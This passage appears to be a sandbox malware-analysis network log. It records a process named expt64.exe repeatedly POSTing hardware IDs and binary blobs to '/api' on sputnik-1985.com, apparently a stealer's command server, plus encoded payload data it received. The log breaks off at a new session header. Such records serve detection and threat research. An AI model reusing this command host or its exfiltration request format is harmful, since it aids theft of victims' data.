                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 72 30 4f 2f 43 48 78 44 33 45 47 35 67 6f 56 4b 6b 51 76 68 63 39 34 74 4b 66 35 55 4a 33 75 57 30 4f 5a 2f 67 77 64 48 66 7a 49 50 4d 67 37 70 33 47 49 38 68 63 6a 32 39 4b 35 68 43 36 55 57 71 68 6d 74 32 72 51 47 7a 32 4d 6b 39 48 2b 6a 78 33 59 50 59 35 74 7a 57 76 69 34 6b 71 7a 68 76 66 4a 6b 76 6e 46 72 39 58 64 36 72 52 6d 4f 35 56 66 37 39 6e 41 6d 66 6e 4e 58 74 33 2b 79 2f 39 49 4f 36 59 7a 53 44 50 58 59 64 6d 44 61 64 58 74 55 38 6c 2b 70 71 77 37 6c 64 7a 75 6e 78 4e 58 61 6f 67 4f 6d 32 37 4c 2f 74 71 75 64 4c 42 4b 4d 46 59 6a 47 6c 4f 34 52 79 67 56 33 65 6b 31 35 62 35 51 58 47 34 59 41 78 31 34 44 46 79 64 2f 49 6a 2f 69 2f 6d 6c 6f 6c 6a 67 6c 79 66 4a 68 57 70 4e 72 39 63 61 61 6a 4e 6b 36 74 59 4f 71 38 71 43 47 75 71 5a 7a 52 77 2b
                                                                                                                                                                                                                        Data Ascii: r0O/CHxD3EG5goVKkQvhc94tKf5UJ3uW0OZ/gwdHfzIPMg7p3GI8hcj29K5hC6UWqhmt2rQGz2Mk9H+jx3YPY5tzWvi4kqzhvfJkvnFr9Xd6rRmO5Vf79nAmfnNXt3+y/9IO6YzSDPXYdmDadXtU8l+pqw7ldzunxNXaogOm27L/tqudLBKMFYjGlO4RygV3ek15b5QXG4YAx14DFyd/Ij/i/mloljglyfJhWpNr9caajNk6tYOq8qCGuqZzRw+
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 68 6c 64 46 74 6d 68 75 32 63 55 61 72 49 72 46 5a 61 36 58 4d 30 2f 51 4a 62 66 5a 74 41 79 65 79 66 33 6c 38 2f 69 33 34 4b 2b 75 63 7a 43 66 4f 55 34 6c 6c 58 2b 59 54 73 6c 74 74 71 4e 65 64 37 30 39 39 76 57 45 4a 5a 2b 73 31 4e 44 71 37 4c 2b 39 71 75 64 4c 39 4b 73 35 57 69 43 52 34 36 68 6d 38 55 48 50 69 78 64 33 79 42 33 4f 36 4b 6c 63 6e 35 6a 5a 30 66 2f 45 73 39 79 33 73 6c 38 6f 71 77 56 61 41 62 45 50 75 45 37 35 65 61 4b 54 61 6c 4f 39 43 5a 72 4e 6a 41 32 75 71 63 54 52 7a 34 32 69 76 61 73 36 56 33 79 37 74 57 4a 5a 76 44 66 5a 5a 71 78 64 69 72 70 72 4c 71 30 42 78 76 6d 45 4a 62 2b 6f 74 63 58 72 77 4b 66 30 73 34 4a 2f 46 4b 38 4a 61 68 32 42 42 36 52 43 31 52 58 65 6e 33 49 48 68 42 7a 72 32 62 52 63 6e 73 6e 39 43 5a 4f 77 35 34 57
                                                                                                                                                                                                                        Data Ascii: hldFtmhu2cUarIrFZa6XM0/QJbfZtAyeyf3l8/i34K+uczCfOU4llX+YTslttqNed7099vWEJZ+s1NDq7L+9qudL9Ks5WiCR46hm8UHPixd3yB3O6Klcn5jZ0f/Es9y3sl8oqwVaAbEPuE75eaKTalO9CZrNjA2uqcTRz42ivas6V3y7tWJZvDfZZqxdirprLq0BxvmEJb+otcXrwKf0s4J/FK8Jah2BB6RC1RXen3IHhBzr2bRcnsn9CZOw54W
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 4a 63 70 55 69 47 4a 44 37 78 47 2f 55 6d 71 6f 79 4a 76 6c 53 6e 2b 35 59 52 31 6e 35 7a 74 34 63 50 4d 6a 2f 57 71 76 30 73 34 31 67 67 50 48 55 30 44 6d 46 37 46 42 4a 62 32 55 69 71 74 41 65 50 59 79 54 32 76 6b 50 33 74 34 39 79 50 2f 4b 2b 32 63 7a 69 6a 4c 55 34 39 30 54 4f 30 66 73 31 6c 71 6f 39 36 57 37 6b 4e 7a 73 6d 77 41 4a 36 52 2f 63 32 79 37 63 4c 63 46 78 71 65 4c 44 50 67 62 6d 43 68 55 71 52 43 2b 46 7a 33 69 31 70 44 6e 54 33 75 77 59 77 4e 74 34 7a 52 34 66 2f 38 6b 2f 69 2f 6e 6b 38 77 6f 77 31 2b 4c 62 45 76 71 46 4c 31 59 61 71 71 61 33 61 74 41 62 50 59 79 54 30 4c 39 4e 48 70 79 75 7a 65 35 4d 36 47 56 78 57 32 61 47 34 74 76 53 2b 38 53 76 6c 5a 6a 71 74 2b 62 37 30 5a 79 73 47 6b 41 59 2b 38 2b 65 33 44 33 4a 76 30 72 34 4a 37
                                                                                                                                                                                                                        Data Ascii: JcpUiGJD7xG/UmqoyJvlSn+5YR1n5zt4cPMj/Wqv0s41ggPHU0DmF7FBJb2UiqtAePYyT2vkP3t49yP/K+2czijLU490TO0fs1lqo96W7kNzsmwAJ6R/c2y7cLcFxqeLDPgbmChUqRC+Fz3i1pDnT3uwYwNt4zR4f/8k/i/nk8wow1+LbEvqFL1Yaqqa3atAbPYyT0L9NHpyuze5M6GVxW2aG4tvS+8SvlZjqt+b70ZysGkAY+8+e3D3Jv0r4J7
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 49 68 69 53 75 55 52 76 56 46 6b 70 39 43 66 37 45 4a 2f 75 57 5a 50 4b 61 6f 34 62 44 53 6a 61 4e 6b 68 38 6f 58 4b 49 38 6c 4e 6e 43 5a 53 70 77 37 79 55 47 6e 69 67 74 50 6f 54 48 2b 79 61 67 4e 6e 37 6a 4a 30 5a 76 51 76 38 43 50 71 67 4d 4d 71 78 56 43 50 62 55 4c 76 42 62 35 5a 64 36 66 49 67 61 73 4a 4e 4c 46 79 54 7a 2b 71 43 58 4e 6b 36 79 75 31 47 2f 65 52 33 79 62 50 56 38 64 35 41 2f 42 58 74 56 73 6c 2b 70 71 56 35 45 35 33 75 57 73 47 61 2b 63 36 66 58 48 36 4c 76 4d 67 36 35 4c 50 4b 38 4e 65 6a 57 56 4d 34 78 36 31 58 32 4b 68 79 4e 4f 6c 42 33 4f 75 4b 6c 63 6e 77 7a 68 6d 65 75 74 6f 36 47 54 34 30 73 34 68 67 67 50 48 59 6b 66 6d 45 37 56 62 59 36 66 63 6e 75 70 49 64 62 5a 6c 43 32 7a 6a 4f 58 56 35 2f 69 58 7a 4f 4f 75 5a 78 69 48 4c
                                                                                                                                                                                                                        Data Ascii: IhiSuURvVFkp9Cf7EJ/uWZPKao4bDSjaNkh8oXKI8lNnCZSpw7yUGnigtPoTH+yagNn7jJ0ZvQv8CPqgMMqxVCPbULvBb5Zd6fIgasJNLFyTz+qCXNk6yu1G/eR3ybPV8d5A/BXtVsl+pqV5E53uWsGa+c6fXH6LvMg65LPK8NejWVM4x61X2KhyNOlB3OuKlcnwzhmeuto6GT40s4hggPHYkfmE7VbY6fcnupIdbZlC2zjOXV5/iXzOOuZxiHL
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 6a 6a 47 72 46 59 5a 72 44 62 6c 66 6c 48 65 62 78 34 42 57 7a 76 4d 6e 6c 35 2b 43 37 78 49 65 32 41 77 43 33 42 55 4d 63 6f 44 65 34 50 38 67 38 6c 67 63 32 46 34 55 42 34 6f 47 45 4f 5a 50 77 79 5a 44 53 31 61 4f 59 74 38 4e 4b 52 4f 39 4a 4d 67 48 6b 44 38 46 65 31 57 79 58 36 6d 70 58 69 51 58 4f 77 5a 42 31 69 37 44 42 37 66 66 49 73 2f 79 6e 68 6c 73 30 71 78 31 69 4c 62 55 72 71 47 4c 5a 65 61 36 76 56 30 36 55 48 63 36 34 71 56 79 66 4c 4a 48 64 34 39 6d 6a 6f 5a 50 6a 53 7a 69 47 43 41 38 64 71 51 2b 77 58 75 46 46 68 70 39 79 5a 37 6b 64 2f 74 57 55 4c 59 65 34 77 64 48 2f 79 4b 66 45 76 36 35 6e 50 49 4d 46 64 67 53 59 44 71 52 43 71 46 7a 33 69 2b 6f 6a 6d 53 33 50 32 64 55 46 2b 71 6a 68 34 4e 4b 4e 6f 2f 43 62 6c 6c 63 6b 67 77 56 4f 43 59
                                                                                                                                                                                                                        Data Ascii: jjGrFYZrDblflHebx4BWzvMnl5+C7xIe2AwC3BUMcoDe4P8g8lgc2F4UB4oGEOZPwyZDS1aOYt8NKRO9JMgHkD8Fe1WyX6mpXiQXOwZB1i7DB7ffIs/ynhls0qx1iLbUrqGLZea6vV06UHc64qVyfLJHd49mjoZPjSziGCA8dqQ+wXuFFhp9yZ7kd/tWULYe4wdH/yKfEv65nPIMFdgSYDqRCqFz3i+ojmS3P2dUF+qjh4NKNo/CbllckgwVOCY
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 6b 57 6e 57 6c 6d 71 79 6c 42 32 7a 32 4d 6b 39 53 36 54 46 36 63 2b 30 35 75 67 33 33 6d 4d 34 39 78 55 79 49 4a 67 4f 70 45 66 49 50 4e 75 79 61 6c 2f 6f 48 4c 4f 59 34 56 44 4b 35 61 43 51 6d 35 47 62 75 61 76 66 53 6b 58 2b 4d 47 35 55 6d 46 61 6c 51 73 55 56 33 70 4e 6d 46 36 41 42 4b 69 45 30 56 61 75 77 6f 5a 55 72 46 4c 2b 30 6e 35 34 58 59 59 64 64 59 69 57 68 4b 2f 31 66 38 46 32 72 69 67 71 71 72 44 7a 53 4a 4a 45 39 2f 71 6d 63 30 51 66 67 6d 2b 53 33 33 67 34 51 4b 32 46 61 42 63 56 79 70 57 66 4a 52 4a 66 71 4b 33 61 74 44 5a 66 59 79 58 7a 57 78 61 69 63 6a 71 33 72 6f 5a 50 6a 53 33 32 32 61 43 63 6b 6d 58 36 6c 50 38 68 42 6d 73 4d 69 56 36 46 46 33 38 56 51 78 53 65 30 35 63 58 50 72 61 74 6b 68 39 5a 57 4a 59 34 4a 55 78 7a 35 30 71 56
                                                                                                                                                                                                                        Data Ascii: kWnWlmqylB2z2Mk9S6TF6c+05ug33mM49xUyIJgOpEfIPNuyal/oHLOY4VDK5aCQm5GbuavfSkX+MG5UmFalQsUV3pNmF6ABKiE0VauwoZUrFL+0n54XYYddYiWhK/1f8F2rigqqrDzSJJE9/qmc0Qfgm+S33g4QK2FaBcVypWfJRJfqK3atDZfYyXzWxaicjq3roZPjS322aCckmX6lP8hBmsMiV6FF38VQxSe05cXPratkh9ZWJY4JUxz50qV
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 34 6f 4c 42 70 51 64 77 70 79 70 58 4e 37 68 6b 49 53 65 73 65 4b 55 31 72 34 75 4a 4f 34 49 44 31 53 67 4e 2b 31 66 71 46 79 4b 68 79 49 48 74 52 47 4b 31 4c 54 46 5a 7a 54 46 7a 64 65 30 34 34 43 57 75 76 50 38 4d 2f 47 57 53 5a 55 50 6e 45 4b 52 47 4a 65 79 61 6e 4b 73 66 54 66 59 69 54 31 69 6b 66 32 77 30 6f 32 6a 43 4b 65 2b 63 7a 6a 76 54 46 71 42 6f 53 75 67 42 6f 6b 42 71 37 66 53 6c 79 67 63 36 39 6d 78 50 50 37 68 78 4e 48 44 71 61 4b 39 36 73 38 6d 63 66 70 55 4c 31 58 6b 44 38 46 65 6b 46 7a 33 77 6c 4e 50 35 42 79 7a 32 4c 51 78 31 2b 44 6c 33 59 76 68 76 79 52 54 47 6e 4d 34 73 31 45 75 4b 61 6d 7a 71 42 72 68 70 57 37 66 5a 6e 65 56 41 59 71 63 71 51 53 66 6c 66 79 78 4e 75 32 43 33 46 61 2f 53 30 57 32 61 47 37 4a 6c 51 2b 63 51 70 45 59
                                                                                                                                                                                                                        Data Ascii: 4oLBpQdwpypXN7hkISeseKU1r4uJO4ID1SgN+1fqFyKhyIHtRGK1LTFZzTFzde044CWuvP8M/GWSZUPnEKRGJeyanKsfTfYiT1ikf2w0o2jCKe+czjvTFqBoSugBokBq7fSlygc69mxPP7hxNHDqaK96s8mcfpUL1XkD8FekFz3wlNP5Byz2LQx1+Dl3YvhvyRTGnM4s1EuKamzqBrhpW7fZneVAYqcqQSflfyxNu2C3Fa/S0W2aG7JlQ+cQpEY
                                                                                                                                                                                                                        2025-01-10 10:36:22 UTC1369INData Raw: 4e 56 35 57 61 52 74 48 32 53 6f 45 33 4e 35 39 78 62 4a 48 66 43 56 32 57 2f 6b 57 4a 46 6c 44 61 64 58 71 68 63 39 34 76 65 42 37 46 64 33 39 45 59 49 61 75 5a 2f 61 7a 72 69 61 4f 46 71 75 63 47 48 62 64 41 62 33 79 59 4b 36 67 57 67 55 57 61 30 32 64 54 56 65 56 6d 6b 62 52 39 6b 71 41 35 35 63 4f 30 39 39 44 72 6d 72 50 63 41 30 46 79 58 5a 51 2f 4d 4c 66 42 6d 63 36 48 61 6e 65 77 48 4f 76 5a 79 54 7a 2b 71 45 6d 5a 7a 36 79 75 31 44 39 76 51 2b 44 76 42 57 34 6c 68 44 61 64 58 76 68 63 39 34 74 65 42 37 46 64 33 2b 6d 30 56 59 4b 6f 67 4f 6d 32 37 50 72 64 79 73 74 79 4a 50 34 49 44 78 79 46 44 35 42 61 78 57 57 61 77 79 4a 58 6f 55 58 66 78 56 44 46 49 34 54 35 6b 65 65 6f 6c 38 7a 7a 66 72 4f 34 72 78 31 79 35 57 48 72 34 45 4b 49 56 51 36 48 4d
                                                                                                                                                                                                                        Data Ascii: NV5WaRtH2SoE3N59xbJHfCV2W/kWJFlDadXqhc94veB7Fd39EYIauZ/azriaOFqucGHbdAb3yYK6gWgUWa02dTVeVmkbR9kqA55cO099DrmrPcA0FyXZQ/MLfBmc6HanewHOvZyTz+qEmZz6yu1D9vQ+DvBW4lhDadXvhc94teB7Fd3+m0VYKogOm27PrdystyJP4IDxyFD5BaxWWawyJXoUXfxVDFI4T5keeol8zzfrO4rx1y5WHr4EKIVQ6HM


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.1249719104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:23 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=WAVL3SHF
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 12784
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:23 UTC12784OUTData Raw: 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 57 41 56 4c 33 53 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                        Data Ascii: --WAVL3SHFContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--WAVL3SHFContent-Disposition: form-data; name="pid"2--WAVL3SHFContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--WAVL3SHFContent-D
                                                                                                                                                                                                                        2025-01-10 10:36:24 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:24 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=97c3ivlu2i8ft3rralndkh989m; expires=Tue, 06 May 2025 04:23:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAACk%2FBBYTBpH9M4ONz%2BK9slx8aWcKqpDREsYOJ%2BnrGYT6mFgkh2VvaaOGEtopRVbeeijxdmFOsNuWzZZnI1zMedgoCDV6ypulWjFywJe0MtUFmubJNFLcR6Kt%2B%2FAT54gmx4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06997ba77c6a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1978&rtt_var=763&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13714&delivery_rate=1414043&cwnd=218&unsent_bytes=0&cid=553cb9fd828e13c0&ts=691&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                        2025-01-10 10:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.2.1249722104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:25 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1K58B3BFUN
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 15031
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:25 UTC15031OUTData Raw: 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43
                                                                                                                                                                                                                        Data Ascii: --1K58B3BFUNContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--1K58B3BFUNContent-Disposition: form-data; name="pid"2--1K58B3BFUNContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--1K58B3BFUNC
                                                                                                                                                                                                                        2025-01-10 10:36:25 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:25 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=v8e9nemri3dle1oi8gebej0l4f; expires=Tue, 06 May 2025 04:23:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9DS5L8dzR%2B3fZjV1Jn8de0vlOXKOFRMV3t3ZmKdGGDfkQhjWQpR9ci9bfviFVw5rXWgs16yrIJ%2FDUb1WSlEOyU8EBeKZ7gdgCMLeay9aqCDlKkVFZ5JtsZbh8S4OGq25Xfr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06a25f0942e9-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1684&rtt_var=636&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15963&delivery_rate=1715628&cwnd=240&unsent_bytes=0&cid=8204e47e2d1c1ee9&ts=522&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                        2025-01-10 10:36:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.1249724104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:26 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=LCECPHTHGH
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 20206
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:26 UTC15331OUTData Raw: 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43
                                                                                                                                                                                                                        Data Ascii: --LCECPHTHGHContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--LCECPHTHGHContent-Disposition: form-data; name="pid"3--LCECPHTHGHContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--LCECPHTHGHC
                                                                                                                                                                                                                        2025-01-10 10:36:26 UTC4875OUTData Raw: 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 30 1c 1d 16 fb 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: b}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>|0~
                                                                                                                                                                                                                        2025-01-10 10:36:27 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:27 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=5vnnarr71cm1eepn38qpmdnb5r; expires=Tue, 06 May 2025 04:23:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnKSL9b5MKcstgSSkxIKDIg9XQd%2FGgY6QHaQLQOXonk0VfL%2FopT%2FACCO8kjeIllD1OhfrJTM2sP%2B%2FwNcVHtx6%2Fbic0uoUlCTWmUyNVADcdvlOScijKioJ1o%2B%2FlBtVVv93M8x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06aaec8a42e9-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1721&rtt_var=653&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21160&delivery_rate=1665715&cwnd=240&unsent_bytes=0&cid=7d8718b14fdbbdda&ts=625&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                        2025-01-10 10:36:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.1249725104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
